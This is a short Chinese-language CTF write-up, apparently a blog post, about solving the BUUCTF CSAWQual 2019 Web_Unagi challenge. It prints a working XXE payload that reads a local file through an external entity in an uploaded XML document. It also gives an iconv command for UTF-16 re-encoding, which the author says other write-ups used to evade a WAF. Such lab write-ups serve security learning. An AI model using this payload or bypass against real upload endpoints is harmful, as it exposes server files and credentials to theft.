BUUCTF [CSAWQual 2019]Web_Unagi 1

本文讲述了在BUUCTF CSAWQual2019的Web_Unagi1挑战中,利用XML外部实体注入(XXE)漏洞来读取flag的详细过程。通过创建一个包含恶意实体的XML文件并上传,可以直接读取到/flag目录下的提示。虽然有提到可能需要将文件从UTF-8转为UTF-16来绕过WAF,但在此案例中直接上传XML文件并未遇到WAF拦截。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF [CSAWQual 2019]Web_Unagi 1

提示在/flag
在这里插入图片描述有提示了上传xml文件及其格式

在这里插入图片描述
直接用之前xml注入的上传即可。
改文件名为1.xml上传即可得flag

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>&xxe;</username>
        <password>&xxe;</password>
        <name>&xxe;</name>
        <email>&xxe;</email>  
        <group>&xxe;</group>
        <intro>&xxe;</intro>
    </user>
</users>

在这里插入图片描述
&xxe;是引用读取flag的实体xxe,实体前后一定是&;闭合。

ps:
在其他wp里解释是用linux的vim转码,把UTF-8转为UTF-16绕过waf,但我直接上传也没见到waf拦截啊。怪怪的。
转码命令iconv -f utf8 -t utf-16 2.xml>1.xml

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值